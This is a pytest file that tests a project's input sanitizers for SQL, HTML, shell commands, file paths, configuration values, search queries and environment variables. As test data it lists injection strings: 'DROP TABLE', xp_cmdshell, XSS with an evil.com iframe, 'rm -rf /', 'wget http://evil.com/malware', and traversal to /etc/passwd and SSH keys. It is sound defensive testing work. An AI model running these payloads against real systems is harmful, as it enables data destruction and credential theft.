# trax/tests/test_input_sanitization.py
#
# 512 lines
# 17 KiB
# Python

"""Unit tests for input sanitization and secure configuration handling."""
import json
import tempfile
import os
import shutil
from pathlib import Path
from typing import Dict, Any
import pytest
from src.security.input_sanitization import (
sanitize_sql_input,
sanitize_html_input,
sanitize_command_input,
sanitize_file_path,
sanitize_config_value,
validate_config_schema,
sanitize_search_query,
sanitize_environment_variable,
InputSanitizationError,
ConfigValidationError,
)
class TestSQLInputSanitization:
    """Checks for ``sanitize_sql_input`` on hostile, benign and boundary input."""

    def test_sanitize_sql_input_removes_sql_injection(self):
        """Injection payloads come back free of SQL keywords and control tokens."""
        # Tokens that must never appear in the sanitizer's output.
        forbidden_tokens = ("DROP", "INSERT", "UPDATE", "DELETE", ";", "--", "/*", "*/")
        payloads = (
            "'; DROP TABLE users; --",
            "' OR '1'='1",
            "'; INSERT INTO users VALUES ('hacker', 'password'); --",
            "admin'--",
            "'; UPDATE users SET password='hacked'; --",
        )
        for payload in payloads:
            cleaned = sanitize_sql_input(payload)
            for token in forbidden_tokens:
                assert token not in cleaned

    def test_sanitize_sql_input_preserves_safe_input(self):
        """Harmless strings pass through the sanitizer unchanged."""
        harmless = (
            "normal text",
            "user123",
            "search query",
            "file_name.txt",
            "path/to/file",
        )
        for text in harmless:
            assert sanitize_sql_input(text) == text

    def test_sanitize_sql_input_handles_edge_cases(self):
        """Empty, ``None``, whitespace-only and long inputs are handled."""
        # Both the empty string and None are expected to yield "".
        for empty_like in ("", None):
            assert sanitize_sql_input(empty_like) == ""
        # Whitespace-only input is returned as-is.
        assert sanitize_sql_input(" ") == " "
        # The output must not be longer than a 1000-character input.
        assert len(sanitize_sql_input("a" * 1000)) <= 1000

    def test_sanitize_sql_input_raises_error_for_critical_attacks(self):
        """The most destructive payloads raise ``InputSanitizationError``."""
        for attack in (
            "'; DROP DATABASE; --",
            "'; SHUTDOWN; --",
            "'; EXEC xp_cmdshell; --",
        ):
            with pytest.raises(InputSanitizationError):
                sanitize_sql_input(attack)
class TestHTMLInputSanitization:
    """Test HTML input sanitization functions."""

    def test_sanitize_html_input_removes_xss_attempts(self):
        """Test that XSS attempts are sanitized."""
        # Fragments that must not survive sanitization of any payload below.
        forbidden_fragments = ("<script>", "javascript:", "onerror=", "onload=", "<iframe")
        xss_attempts = [
            "<script>alert('xss')</script>",
            "<img src=x onerror=alert('xss')>",
            "javascript:alert('xss')",
            "<iframe src='http://evil.com'></iframe>",
            "<svg onload=alert('xss')>",
        ]
        for xss_attempt in xss_attempts:
            sanitized = sanitize_html_input(xss_attempt)
            for fragment in forbidden_fragments:
                assert fragment not in sanitized

    def test_sanitize_html_input_preserves_safe_html(self):
        """Test that safe HTML is preserved.

        Each sample is paired with the opening-tag marker that must still be
        present after sanitization. The anchor sample carries an ``href``
        attribute, so its marker is ``"<a "``; the literal ``"<a>"`` never
        occurs in that sample and checking for it would assert nothing.
        """
        safe_html = [
            ("<p>Normal paragraph</p>", "<p>"),
            ("<strong>Bold text</strong>", "<strong>"),
            ("<em>Italic text</em>", "<em>"),
            ("<a href='https://example.com'>Link</a>", "<a "),
        ]
        for html, expected_marker in safe_html:
            # Guard against a sample/marker mismatch silently weakening the test.
            assert expected_marker in html
            sanitized = sanitize_html_input(html)
            assert expected_marker in sanitized

    def test_sanitize_html_input_handles_edge_cases(self):
        """Test edge cases for HTML input sanitization."""
        # Empty input
        assert sanitize_html_input("") == ""
        assert sanitize_html_input(None) == ""
        # Plain text
        assert sanitize_html_input("plain text") == "plain text"
        # Mixed content: the script tag goes, the surrounding text stays.
        mixed = "Normal text <script>alert('xss')</script> more text"
        sanitized = sanitize_html_input(mixed)
        assert "<script>" not in sanitized
        assert "Normal text" in sanitized
        assert "more text" in sanitized
class TestCommandInputSanitization:
    """Checks for ``sanitize_command_input``."""

    def test_sanitize_command_input_removes_command_injection(self):
        """Shell metacharacters and chained commands are absent from the output."""
        # Separators and command fragments that must not appear in the result.
        forbidden_fragments = (";", "&&", "|", "rm -rf", "cat /etc", "wget")
        hostile_arguments = (
            "file.txt; rm -rf /",
            "file.txt && rm -rf /",
            "file.txt | rm -rf /",
            "file.txt; cat /etc/passwd",
            "file.txt; wget http://evil.com/malware",
        )
        for argument in hostile_arguments:
            cleaned = sanitize_command_input(argument)
            for fragment in forbidden_fragments:
                assert fragment not in cleaned

    def test_sanitize_command_input_preserves_safe_commands(self):
        """Ordinary file names and relative paths are returned unchanged."""
        for argument in (
            "file.txt",
            "path/to/file",
            "filename with spaces.txt",
            "file-name_123.txt",
        ):
            assert sanitize_command_input(argument) == argument

    def test_sanitize_command_input_handles_edge_cases(self):
        """Empty, ``None`` and whitespace-only inputs are handled."""
        # Both the empty string and None are expected to yield "".
        for empty_like in ("", None):
            assert sanitize_command_input(empty_like) == ""
        # Whitespace-only input is returned as-is.
        assert sanitize_command_input(" ") == " "
class TestFilePathSanitization:
    """Checks for ``sanitize_file_path``."""

    def test_sanitize_file_path_removes_dangerous_paths(self):
        """Traversal sequences and sensitive locations are absent from the output."""
        # Path fragments that must not survive sanitization.
        forbidden_fragments = ("..", "/etc/", "/root/", "System32", ".ssh")
        hostile_paths = (
            "../../../etc/passwd",
            "/etc/passwd",
            "/root/.ssh/id_rsa",
            "C:\\Windows\\System32\\config\\SAM",
            "~/.ssh/id_rsa",
        )
        for candidate in hostile_paths:
            cleaned = sanitize_file_path(candidate)
            for fragment in forbidden_fragments:
                assert fragment not in cleaned

    def test_sanitize_file_path_preserves_safe_paths(self):
        """Plain relative paths are returned unchanged."""
        for candidate in (
            "file.txt",
            "path/to/file.txt",
            "subdirectory/file.txt",
            "file with spaces.txt",
        ):
            assert sanitize_file_path(candidate) == candidate

    def test_sanitize_file_path_handles_edge_cases(self):
        """Empty, ``None`` and current-directory inputs are handled."""
        # Both the empty string and None are expected to yield "".
        for empty_like in ("", None):
            assert sanitize_file_path(empty_like) == ""
        # References to the current directory are kept verbatim.
        for dotted in (".", "./file.txt"):
            assert sanitize_file_path(dotted) == dotted
class TestConfigValueSanitization:
    """Checks for ``sanitize_config_value``."""

    def test_sanitize_config_value_validates_types(self):
        """Values are coerced to, or kept as, the requested type."""
        # (raw value, requested type, expected result) for str and int.
        for raw, wanted_type, expected in (
            ("string", str, "string"),
            ("123", str, "123"),
            ("123", int, 123),
            (123, int, 123),
        ):
            assert sanitize_config_value(raw, wanted_type) == expected

        # Booleans are compared by identity, not just equality.
        assert sanitize_config_value("true", bool) is True
        assert sanitize_config_value("false", bool) is False
        assert sanitize_config_value(True, bool) is True

        # Floats from both a string and a native float.
        for raw in ("123.45", 123.45):
            assert sanitize_config_value(raw, float) == 123.45

    def test_sanitize_config_value_handles_invalid_types(self):
        """Unparseable values raise ``ConfigValidationError``."""
        for raw, wanted_type in (
            ("not_a_number", int),
            ("not_a_bool", bool),
            ("not_a_float", float),
        ):
            with pytest.raises(ConfigValidationError):
                sanitize_config_value(raw, wanted_type)

    def test_sanitize_config_value_enforces_bounds(self):
        """Values outside ``min_value``/``max_value`` raise ``ConfigValidationError``."""
        # Integer range 0..100: one in-range value, one below, one above.
        int_bounds = {"min_value": 0, "max_value": 100}
        assert sanitize_config_value("50", int, **int_bounds) == 50
        for out_of_range in ("-1", "101"):
            with pytest.raises(ConfigValidationError):
                sanitize_config_value(out_of_range, int, **int_bounds)

        # Float range 0.0..1.0: one in-range value, one below.
        float_bounds = {"min_value": 0.0, "max_value": 1.0}
        assert sanitize_config_value("0.5", float, **float_bounds) == 0.5
        with pytest.raises(ConfigValidationError):
            sanitize_config_value("-0.1", float, **float_bounds)

    def test_sanitize_config_value_handles_edge_cases(self):
        """``None`` and the empty string are rejected for ``str`` values."""
        for missing in (None, ""):
            with pytest.raises(ConfigValidationError):
                sanitize_config_value(missing, str)
class TestConfigSchemaValidation:
    """Checks for ``validate_config_schema``."""

    def test_validate_config_schema_validates_required_fields(self):
        """A config missing a required key raises ``ConfigValidationError``."""
        schema = {
            "type": "object",
            "required": ["api_key", "base_url"],
            "properties": {
                "api_key": {"type": "string"},
                "base_url": {"type": "string"},
                "timeout": {"type": "integer", "default": 30},
            },
        }
        complete = {
            "api_key": "secret_key",
            "base_url": "https://api.example.com",
        }
        # Same config with the required "base_url" dropped; built before any
        # validator call so it does not depend on what validation does to its input.
        incomplete = {key: value for key, value in complete.items() if key != "base_url"}

        # The complete config must validate without raising.
        validate_config_schema(complete, schema)

        with pytest.raises(ConfigValidationError):
            validate_config_schema(incomplete, schema)

    def test_validate_config_schema_validates_field_types(self):
        """A field whose value has the wrong type raises ``ConfigValidationError``."""
        schema = {
            "type": "object",
            "properties": {
                "timeout": {"type": "integer"},
                "enabled": {"type": "boolean"},
                "url": {"type": "string"},
            },
        }
        well_typed = {
            "timeout": 30,
            "enabled": True,
            "url": "https://example.com",
        }
        # Identical except that "timeout" holds a string instead of an integer.
        badly_typed = {**well_typed, "timeout": "not_a_number"}

        # The well-typed config must validate without raising.
        validate_config_schema(well_typed, schema)

        with pytest.raises(ConfigValidationError):
            validate_config_schema(badly_typed, schema)

    def test_validate_config_schema_handles_nested_objects(self):
        """Type errors inside a nested object raise ``ConfigValidationError``."""
        schema = {
            "type": "object",
            "properties": {
                "database": {
                    "type": "object",
                    "properties": {
                        "host": {"type": "string"},
                        "port": {"type": "integer"},
                    },
                },
            },
        }
        well_typed = {
            "database": {
                "host": "localhost",
                "port": 5432,
            },
        }
        # Fresh nested dict whose "port" holds a string instead of an integer.
        badly_typed = {
            "database": {**well_typed["database"], "port": "not_a_number"},
        }

        # The well-typed config must validate without raising.
        validate_config_schema(well_typed, schema)

        with pytest.raises(ConfigValidationError):
            validate_config_schema(badly_typed, schema)
class TestSearchQuerySanitization:
    """Checks for ``sanitize_search_query``."""

    def test_sanitize_search_query_removes_sql_injection(self):
        """Injection-style queries come back without ``DROP``, ``OR`` or ``--``."""
        forbidden_tokens = ("DROP", "OR", "--")
        for hostile_query in (
            "'; DROP TABLE users; --",
            "' OR '1'='1",
            "admin'--",
        ):
            cleaned = sanitize_search_query(hostile_query)
            for token in forbidden_tokens:
                assert token not in cleaned

    def test_sanitize_search_query_preserves_safe_queries(self):
        """Ordinary search phrases are returned unchanged."""
        for phrase in (
            "transcription",
            "audio file",
            "podcast episode",
            "lecture notes",
        ):
            assert sanitize_search_query(phrase) == phrase

    def test_sanitize_search_query_handles_special_characters(self):
        """Queries containing punctuation never yield ``;`` or ``--``."""
        punctuated_queries = (
            "file-name.txt",
            "path/to/file",
            "file with spaces",
            "file@domain.com",
        )
        for query in punctuated_queries:
            cleaned = sanitize_search_query(query)
            # Only the dangerous separators are checked; other punctuation is not asserted on.
            for token in (";", "--"):
                assert token not in cleaned
class TestEnvironmentVariableSanitization:
    """Checks for ``sanitize_environment_variable``."""

    def test_sanitize_environment_variable_removes_dangerous_chars(self):
        """Shell separators are absent from sanitized variable names."""
        shell_separators = (";", "&&", "|")
        for hostile_name in (
            "PATH; rm -rf /",
            "HOME && rm -rf /",
            "USER | rm -rf /",
        ):
            cleaned = sanitize_environment_variable(hostile_name)
            for separator in shell_separators:
                assert separator not in cleaned

    def test_sanitize_environment_variable_preserves_safe_names(self):
        """Conventional upper-case variable names are returned unchanged."""
        for variable in ("API_KEY", "DATABASE_URL", "LOG_LEVEL", "DEBUG_MODE"):
            assert sanitize_environment_variable(variable) == variable

    def test_sanitize_environment_variable_handles_edge_cases(self):
        """Empty, ``None`` and whitespace-only inputs are handled."""
        # Both the empty string and None are expected to yield "".
        for empty_like in ("", None):
            assert sanitize_environment_variable(empty_like) == ""
        # Whitespace-only input is returned as-is.
        assert sanitize_environment_variable(" ") == " "
class TestInputSanitizationIntegration:
    """End-to-end checks that chain the SQL, HTML and command sanitizers."""

    def test_comprehensive_sanitization_pipeline(self):
        """A combined SQL/XSS payload is neutralized by the chained sanitizers."""
        payload = "'; DROP TABLE users; -- <script>alert('xss')</script>"
        # Order matters: SQL first, then HTML, then command sanitization.
        fully_cleaned = sanitize_command_input(
            sanitize_html_input(sanitize_sql_input(payload))
        )
        for fragment in ("DROP", "<script>", ";", "--"):
            assert fragment not in fully_cleaned

    def test_sanitization_preserves_legitimate_content(self):
        """Key words of a benign sentence survive the chained sanitizers."""
        sentence = "Search for audio files in /path/to/files"
        # Order matters: SQL first, then HTML, then command sanitization.
        fully_cleaned = sanitize_command_input(
            sanitize_html_input(sanitize_sql_input(sentence))
        )
        for word in ("Search", "audio", "files", "path"):
            assert word in fully_cleaned